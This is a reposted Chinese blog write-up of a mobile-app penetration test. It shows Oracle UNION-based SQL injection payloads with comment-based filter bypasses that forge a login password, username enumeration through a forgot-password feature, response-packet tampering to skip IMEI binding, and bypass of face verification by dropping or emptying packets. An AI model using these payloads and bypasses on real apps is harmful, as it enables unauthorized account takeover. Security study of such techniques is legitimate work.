SQL 登录注入脚本_App渗透 从SQL注入到人脸识别登录绕过

最新推荐文章于 2023-08-27 00:24:48 发布
最新推荐文章于 2023-08-27 00:24:48 发布
阅读量444 收藏 5
点赞数
文章标签: SQL 登录注入脚本

作者:Broken5      文章来源:先知社区

App渗透 - 人脸识别登录绕过

打开APP是一个登录框

6307ad12b4d9d51bad8cb1b2e2748e72.png

抓包后发现参数被加密了

d9119110dff16d50c06904be6ef9afa0.png

使用Jadx脱源码发现,并没有加壳也没有混淆,运气很好

727e1588663c05fb1dcc02bd0a206c84.png

根据经验,先搜索Encrypt、Decrypt等关键字,发现在Common.js中有一个encryptData函数

6162609b3fb679cdfe66da13c4ce5df2.png

定位过去,一套加解密算法都写好了放在这

631671798f96b91d1287b708e8243722.png

放到浏览器console里面调试,果然没错

9b791a9f305066b6641ad72faf9fab71.png

首先测试了一下注入

明文:{"userName":"TEST'","passWord":"123456","osType":"android","osVersion":"5.1.1","appVersion":"20.06.04","loginType":"1","model":"V1938T","brand":"vivo","imei":"865166023309431","version":"new"}
密文:QSXBDUSV0QpJkd5tWYR90SshkWzZFVipkWUNFcK1GZzpkeZVjWWJ2asJDZwxWRl5kUrRVMFtWZOBHWTVUMr1kWSZFV4tmRSBFbyIWcsV0YXRGbZdHcwEVTsd0T0J1RjFWNXNlMrBTUhZlbSRnTXF2SOVEVwZEbSBFczEWVxAjVLxmMUBHZzYVY0d1TYp0VhNDbXNFNsVVYQx2VWhkTX50U41WW3JVbNlmTuNFR4VVYSJVVUFDbGJlTWhVUxFTVhZHcXNVMspnVoBnbTlFcxY1QoBTWvBHMR1EbXJVc4VUZw0EbUBXOtFmSWh1TYZUbltEasdFW1ATTpxmMkBHbwE2cKpWW1okVilGatNFc5UVYWRGMZFTSW1kaa52UEhXVhplUsR1dwsWYOhGWTBXOVFmUxITWyI1VNpGcuJFSOdVYzw2VTVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW
结果:App返回异常

3c75533ccd3590b9a03ee9fda30c19b5.png

明文:{"userName":"TEST''","passWord":"123456","osType":"android","osVersion":"5.1.1","appVersion":"20.06.04","loginType":"1","model":"V1938T","brand":"vivo","imei":"865166023309431","version":"new"}
密文:JdFMQJVRDlmQ2l3ahJlWXFmaox2VxAXVhBFbH5UeJd0YPVjMZNHcsJmSOh1UUFzalJlUxQ1MxsWZOxGWRFXNr1kRSxGV5NWbhpkWUNFVGdkY4NmVZBHZYFmSa52VZZUbNtEbyQFcGZlYphWbTVHbWF2Msd1UWhWbl5kVUJVcaZVY2B3VTpnWxIVYahVT0xGMjpkTWRFc50WYKhXbRllVXZVMjZVW1xmeSlGbyQGcsVUTCB3RUlXRrFWTkh1Uxx2aOpEbtllM41WTqxmbWRnWxQ2QoZ1VwRGWhpEaI5EVxUFZWB3VTJzaVFWaahkY510VldVMtZlNsRlYK5EWTREcGNWNwITWyZleWpFbyIWcsVkYDhmVaZVNw0UasJDZwx2aNZlUrRlNsVkVOxmMiFHbwE2SOpWWZVDMNpGatFVdsBzYKxmbTVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW
结果:App返回正常

e0d0835e437d3f74ece90678e73c0a82.png

明文:{"userName":"TEST'or'1'='1","passWord":"123456","osType":"android","osVersion":"5.1.1","appVersion":"20.06.04","loginType":"1","model":"V1938T","brand":"vivo","imei":"865166023309431","version":"new"}
密文:k0VwAlUFNUaCZXerFWRspFcOd0VhZlbTBXOVFGMJpWW3VzaipGetdVdsBzYK5kVUZjRGZFUkhFV2ETVlJEctRVeVVkVPpkeaFHbr5kSOZVWzZkeWhGbyQGcstGZhhmVZl3bVFGUsdVV0p0RhtUNXdFckhVYKZlRhZTMV5kRw1mVwlTbhpkTuZFSwxGZ4BzVTpHbwUlTsJjYxxWRiNEaWplVWpnVoVzVPhkSXF2Msd1U3V0ah1kSUFVc4BDZKB3VTJzaVFWaahkY510VldVMtZ1MKV0VaxmMkBHbFVGMNZFVxYFbhpkWUNFcK1GZzpkeZVjWWJ2Vwh1T0xGMjpkTrd1dsRlYqR3VOhFbWFmdwd1UzpURXxmVsRleJdVYzw2VTlXVGJ1Twh1UVFTVhZHcXNlcwBTTphGbUpXTHF2Q1c1U6xWVltEb6lFVxsmYK5kaZVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW
结果:App返回正常

1cddd3446e87cd64d375adb82767b6e4.png

至此已经可以判断该登录点就是一个注入了,可是返回结果始终都是“用户名或密码错”即使用了' or '1'='1

733684368102985ffea845b48add73e2.png

根据返回结果推测,后端的登录处的逻辑代码可能是这样的

userInfo = 'select * from userinfo where username = ';
userPass = userInfo.password;
if (userPass == ){
    return 'Login success';
}else{
    return 'Login failed';
}

通过Union注入构造万能密码,是可以造成任意用户登陆的,测试过程如下
先使用order by测试,得知字段的数量为9个,构造payload

# 由于目标服务器带有过滤,所以这里简单的bypass一下
明文:{"userName":"TEST'union/**/select/**/null,null,null,null,null,null,null,null,null from dual-- ","passWord":"123456","osType":"android","osVersion":"5.1.1","appVersion":"20.06.04","loginType":"1","model":"V1938T","brand":"vivo","imei":"865166023309431","version":"new"}
密文:JdFMQJVRDlmQ2l3ahFkaipkTqZFdKdVY2B3VTFDb6ZFaw52UZBHbNtkTFRFcWtWZOJkehVUMrVmTwdFVzwGbh9EaYZVc1UkTKxmMUBHdyYVYShkY0xGMjpEbulVe3dlYrxmMiFHbwEWMjZ1V1AXVipkTYNFRaZkTOJVMURDbGJmSaR1UEp0RiNlSqlFMwBTUNx2VSFHbr5kSOx2Vzg3RTdlVIJWevxGZ0EzVTpHbwE1TkhkTwVDMkBTTVRVNsVVYQx2ROlXSHN2T1ITWzBHbSpGZuJFdsBzYK5kVUFjVrFWTGR1UwlTVhBTSql1d1smYqhXbXhXTtR2SOVEVwZUMWhmWuNVSwZFZHFzVTJzawUVYkhkYJpFblVDMXNlesVVYPZEVVZTMVVmRwd1UysGMRFGbY9UeZxWZPhmVXNDcwEVTsdVUUhXRkJkTrl1baZ0UhR2RNlXSXVWYkV1U6h2MWtmVIVGRKJzYXVTbZpHZzIVaGRlTIhHMjRDZGpVMoNTUp5kbWVnSyM2MktWW4VleS1kTIVGWSdFZ040aZpnWsJWaONDZIp0VNFTSERFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW
结果:App返回成功

3f89673b1da5b8181f411916606a49fa.png

由于Oracle在进行union查询时,所对应的字段数据类型也必须相同,所以还要进行字段数据类型的测试,最终结果如下

# 注意这里passWord我修改成了123,用来测试Union构造的万能密码是否可行
明文:{"userName":"TEST'union/**/select/**/1,'123','123','123','123','123','123','123',1 from dual-- ","passWord":"123","osType":"android","osVersion":"5.1.1","appVersion":"20.06.04","loginType":"1","model":"V1938T","brand":"vivo","imei":"865166023309431","version":"new"}
密文:QSXBDUSV0QpJkd5tWYB1UdsBTTXFTbZBXOtFmSWh1TYZUbltEasdVevBTUNx2VSZTMF1kcSVFV2Ezah5EZYdVc1UUZWBXbUBzaVFGUsJTYYBnRkNXMXNlesVVZppERiRnUXFmdwd1UyZleWpFbuNFdsBzYK50aWBDMFZFUoh1Vzx2aOpkTrl1cKxWTpJlbTREeVFmRwd1UysGMVFGZIJWSaZFZzpkaXJDaYJmSOh1UEVDMkBzatR1MSpXUOxGWTBXOVFGMJpWW3VzaipGetd1ROJDZHFzVTpHbwUlTWhlUxhXVNpEbyQFcSpWTpJkbUVnTHJWYGpXWyAHMR1EbXVFWG1GZLh2aXFjWVJmSaR1UUBXMkNHarZlNsRlYK5EWTVTMVVmRwd1UysGMRFGbY9UeZxWZPhmVXNDcwEVTsdVUUhXRkNDZWdFeJFjUKJFWPRnTXJ2QOZFV650Vl5EbYJlNwBzYqxGWUVjVrV2SONTW1ETVlZEcuNleOdVZOxGWSZDcwMmashFV1Y1altkTzkVNxUVZGBnbTpnTXVmTshlU2AHMjZEcIRFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW
结果:提示是弱密码(说明此方法可行)

93e4305efde4aa47f960f7e4f932e60d.png

4572b662055c832cde602b607c47489d.png

接下来就是一个字段一个字段的改过去,判断哪个字段对应的是密码字段,测试结果如下

# 注意这里passWord我修改成了Ceshi123@@@,不再是弱口令了
明文:{"userName":"TEST'union/**/select/**/1,'123','123','Ceshi123@@@','123','123','123','123',1 from dual-- ","passWord":"Ceshi123@@@","osType":"android","osVersion":"5.1.1","appVersion":"20.06.04","loginType":"1","model":"V1938T","brand":"vivo","imei":"865166023309431","version":"new"}
密文:k0VwAlUFNUaCZXerFWUPtEbIp1cWRlYKpFVTBnStR2cKpXW1olVitGbyQGcsVUZOJ1aUFTRrVmTwh1UFFzaNplUWRFerZkUQxmMiFHbFN2VkxWW3BHMR1EbH9EdSd0YhVzVTJzawEVYW5mU050VhtkTFRFcGxmUQB3MhVVMwY1SsJDVwR2MWFGdX9EWKdVYzw2VTRDbVFGUsdlVI50VONFetl1dS1WTp5kbTREeVFmUSVFVxwmRS5kVYFVcxUVY2B3VTFDb6ZFaw52UZBXMWNEawk1bwBTUNx2VSFHeFVGMNxGVwlTbhpkVY9EWG1WZLhGbXhVNw0UasJDZwxGMhNnSqlVNKZlYphWbTBXOVFmVkBTWxkkVNpmWuNFR4VVYCZVVVJUNrFmToNTYIZUbldlSUVFc50WYKRXbTpXSHd1TOpXWvp0aipkTYNFRsVEZ310aZ9mWGNVYkdUT5l0VlFGZVNFNkhVZLBHWTVVMrJ2Ms52U2wWRW5UNyQWNwtWZKJlVUVHZYV2Swh1UVFzaiNDbuNlQKVlUSBHWTVVMFN2bKpXWzVTRNtkTzkVNxUVZGBnbTpnTXVmTshlU2AHMjZEcIRFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW
结果:提示登录成功

1ae6224b7a352e1f6220837674d73245.png

22d3543d79705230355fd3ceb107ef8f.png

在绕过后,发现程序出现了异常

9a773edc76d2595d2302e86d06a3ae0b.png

仔细观察返回的数据,其中有username(用户名)、staffId(职工号)、email(邮箱)、staffName(姓名)、tel(手机号)、mobile(手机号),然而这些数据都是我刚刚自己随便构造的,这里应该需要一个真实的用户信息,供后续的登录流程使用

22d3543d79705230355fd3ceb107ef8f.png

好在,还是有一个地方能获取真实的用户信息的
App还有一个忘记密码的功能(通常这里可以爆破用户名)

c2f147f24a65888f35ba8894fea64ff8.png

利用忘记密码的功能可以判断用户名是否存在,这里随便跑了一下字典,就出来好多用户名

411175b3a6b85bb671395b5cbc163dad.png

adaa81787910f3823aa36aa27668dcfb.png

自然而然地利用这些用户名使用短信验证码登录

aa0e3768f425d0d99bf655d98b92bb16.png

获取验证码,然后解密数据包,惊奇的发现返回了用户基本信息

b672d5fd706bba67d4fa5f179a2f2016.png

根据登录返回结果,重新测试payload,最终结果如下

明文:{"userName":"TEST\'union/**/select/**/,\'Qwe123@@@\',\'\',\'Qwe123@@@\',\'\',\'\',\'\',\'865166023309431\', from dual -- ","passWord":"Qwe123@@@","osType":"android","osVersion":"5.1.1","appVersion":"20.06.04","loginType":"1","model":"V1938T","brand":"vivo","imei":"865166023309431","version":"new"}
密文:xxxxxxxxx
结果:提示登录成功

54ce69e69bcb5d24e817fb21968ce559.png

仔细看返回的登录数据,已经正常了

0b86b472fb1cc2d1a8896f1622e200be.png

然后重新替换数据包登录,提示绑定IMEI

3b24844261f972226939a2369460c5e5.png

这个绕过很简单,随便输入验证码,替换返回包,把resultCode从1001改为1000就行(常规操作)

28381e40f9f9091f9a3a1bd5d5a40713.png

54587d8262be1804978751481d093cb6.png

最终还要个人脸认证

f23b2bbd23458b4f1cc331af758ee07c.png

先用自己的脸检测,这时候手机会向服务器发包,burp把手机发向服务器的包直接丢掉就可以绕过

706bb6d77b4ae1ca230df0238c62e052.png

点击确定后,还有一个大数据包发向服务器,这里面包含的是人脸数据

901e3c037afc07eeac04330fc624f991.png

修改数据包,将其中的人脸数据替换为空,然后发送

ef1fc88924d2a2d425365901dc51b43d.png

6f2a3e0d43adbe4dd1dfb6d8f03b0915.png

最终的最终,成功登录APP

929c1074f2b36a131a5b786107fd5613.png

3a00b8c14bd923d3b011ec0a710983bc.png

关注公众号:HACK之道

e12b998c698d22599ca5981067962c33.png

weixin_39601929
关注
人脸识别系统源码以及数据库.rar
01-01
根据ArcSoft的工具包设计的简单人脸识别DEMO,仅供学习。APPID等需要到ArcSoft注册一个应用获得 开发环境准备: ###开发使用到的软件和工具: Jdk8、mysql5.7、libarcsoft_face.dll(so)、libarcsoft_face_engine....
用户登录页面--SQL注入
李书明(石家庄)的专栏
01-23 1万+
web网站攻击方式多种多样,sql注入是经常使用的攻击方向。攻击者把SQL命令插入到Web表单的输入域或页面请求的字符串,欺骗服务器执行恶意的SQL命令 SQL注入不是Web或数据库服务器中的缺陷,而是由于编程实践较差且缺乏经验而导致的。 动态拼接的SQL指令最易受攻击。 如登录使用SQL指令: $query = 'SELECT * from Users WHERE login = ' ...
SQL 登录注入脚本_App渗透 - 从SQL注入人脸识别登录绕过
weixin_39535557的博客
11-21 397
App渗透 - 人脸识别登录绕过打开APP是一个登录框抓包后发现参数被加密了使用Jadx脱源码发现,并没有加壳也没有混淆,运气很好根据经验,先搜索Encrypt、Decrypt等关键字,发现在Common.js中有一个encryptData函数定位过去,一套加解密算法都写好了放在这放到浏览器console里面调试,果然没错首先测试了一下注入明文:{"userName":"TEST'","passW...
oracle sql查询时间_「Burpsuite练兵场」SQL注入及相关实验(二)
weixin_39715652的博客
12-04 164
Burpsuite练兵场系列文章更新啦,今天的内容是延续上期关于SQL注入及相关实验的讲解,对实验感兴趣的小伙伴千万别错过了呦!上期回顾「Burpsuite练兵场」SQL注入及相关实验(一)上节内容介绍了一些基础的SQL注入操作,这一节实验学习的内容为如何在探查到了SQL注入点后利用漏洞获取到数据库信息。通过SQL注入获取数据库信息获取数据库的关键信息,如数据库中的表和列需要访问保存描述各种数据库...
漏洞学习--SQL注入
qq_45675619的博客
02-19 5577
漏洞学习--SQL注入
Web渗透测试之SQL注入:基于盲注的登录界面绕过
vodkaDL的博客
11-23 2652
文章目录前言题目分析burpsuite抓包SQLMap扫描总结 前言 本篇将讲解如何在无回显不打印错误信息的情况下绕过登录界面并获得数据库中我们想要的信息。 题目分析 题目页面如下: 还是老套路,先尝试提交一个单引号: 结果如下:   竟然没有报错信息,莫慌,还有双引号、括号等组合没试呢,都逐个尝试尝试。理想很美好,但都无法触发错误,费时费力不说,目前就连是否存在可注入漏洞都不确定。无奈之下只得掏出了SQLMap这一大利器。   在讲如何使用工具前其实还有一个取巧的方法:符号 + or 1=1 - -
beego-FaceRecognition:基于beego框架的人脸识别系统
03-11
web框架使用beego前端页面使用easyUI运行方式从百度云中创建,将AppID,API密钥,秘密密钥填充到配置文件conf / app.conf中数据库为mysql,将主机,端口,用户,passwd填入配置文件conf / app.conf中数据库初始化...
Python开发基于OpenCV2机器学习人脸识别系统源码.zip
03-14
在本项目中,开发者使用Python和OpenCV2构建了一个基于机器学习的人脸识别系统。OpenCV(开源计算机视觉库)是一个强大的计算机视觉和图像处理库,它提供了多种图像和视频处理的功能,包括图像读取、操作、转换以及...
FamilyTouchDemo:智能社区APP
07-12
4. **智能门禁**:集成人脸识别或二维码扫描技术,实现无接触式进出,提升社区安全性。 5. **访客管理**:访客可以通过APP预约访问,物业审核后发放临时通行权限,确保社区秩序。 6. **停车管理**:自动识别车辆,为...
基于android studio的学生信息管理系统(源码+数据库脚本).zip
08-23
为了实现人脸识别签到功能,开发者可能利用了开源的人脸识别库,如OpenCV或者Face++等。这些库提供了面部检测和识别的API,可以将上传的头像与预先录入的人脸信息进行比对,从而完成签到。值得注意的是,系统要求...
利用SQL注入漏洞登录后台的实现方法 。。。。转载
diqiao5268的博客
10-21 194
一、SQL注入的步骤a) 寻找注入点(如:登录界面、留言板等)b) 用户自己构造SQL语句(如:' or 1=1#,后面会讲解)c) 将sql语句发送给数据库管理系统(DBMS)d) DBMS接收请求,并将该请求解释成机器代码指令,执行必要的存取操作e) DBMS接受返回的结果,并处理,返回给用户因为用户构造了特殊的SQL语句,必定返回特殊的结果(只要你的SQL语...
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1967
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
mysql 登录注入_sqlmap之(六)----POST登陆框注入实战
weixin_30698775的博客
01-19 683
利用sqlmap进行POST注入,常见的有三种方法:注入方式一:1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.列数据库:sqlmap.py-r"c:\Users\fendo\Desktop\post.txt"-pn--dbs注:-r表示加载一个文件,-p指定参数其中出现了三次提示:it looks like the back-end D...
burpLab——sql注入学习笔记
最新发布
2201_75353421的博客
08-27 261
为了加深对sql注入的实战理解,这里我对burp官方的sql注入靶场做了一次全通关解析,针对备忘录清单也重点截取了上来,希望这篇sql注入学习笔记能对你有所帮助。
asp.net request防sql注入_「Burpsuite练兵场」SQL注入之带外通信
weixin_39915081的博客
11-26 208
SQL注入带外通信OOB(Out-of-Band)带外通信注入也是一种挺常见的注入手法,与之前的带内通信相比(发送请求,返回结果都在同一条信道内),需要借助一个额外的服务器用于获取带外信道数据。具体操作即为通过注入SQL语句,构造请求到服务器中,以此将我们所需查询的数据带出来。那什么时候我们需要使用带外注入技术呢?当Web应用不产生任何错误响应,并且任何响应报文与SQL语句不存在逻辑关联,基于时间...
SQL注入漏洞学习小结
dayouzi的博客
08-22 696
Web 程序代码中对于用户提交的参数未做过滤就直接放到SQL 语句中执行,导致参数中的特殊字符打破了 SQL 语句原有逻辑,攻击者可以利用该漏洞执行任意 SQL 语句,如查询数据、下载数据、写入 webshell 、执行系统命令以及绕过登录限制等。
使用BurpSuite实验室练习SQL注入攻击
Brisbane的博客
04-12 4501
因为之前对HTTP和Java都不熟悉,所以想要一开始就使用实验室师兄给的在线平台练习有点困难。好在我在一本参考书上看到推荐使用BurpSuite的在线实验室,又因为前段时间我恰好学习了Burp的网络扫描相关,于是我尝试着利用这个软件进一步的学习WEB的网络安全。后来发现上面的练习难度适中,并且既有原理说明,又有操作指导,强烈推荐像我这样的新手入门使用。 这周首先学习的是SQL注入攻击的第一部分。实...
SQL注入(万能密码)
qq_69432323的博客
03-14 5770
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)
和平精英怎么抓包人脸识别界面
热门推荐
weixin_64516498的博客
09-22 3万+
1.手机安卓 下载一个Httpcanary小黄鸟,去设置里面把目标应用改成QQ,对于出现的以下界面进行抓包 抓到的包,依次找到以下链接 最后一个from后面链接就是 2.iPad平板 下载一个stream,同样是对人脸验证界面抓包 抓到的包,找到以下链接 可以看出是第二个,点进去,点击请求,长按请求信息,选择URL 解码 选中以下链接复制,就是我们想要的链接了
SQL注入攻击详解:从基础到绕过过滤
SQL注入是一个严重的安全问题,它允许攻击者绕过安全控制,窃取或篡改数据。了解如何检测和利用这些漏洞对于提高系统的安全性至关重要。同时,开发者应当始终牢记,良好的编程习惯和安全措施是防止此类攻击的关键。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值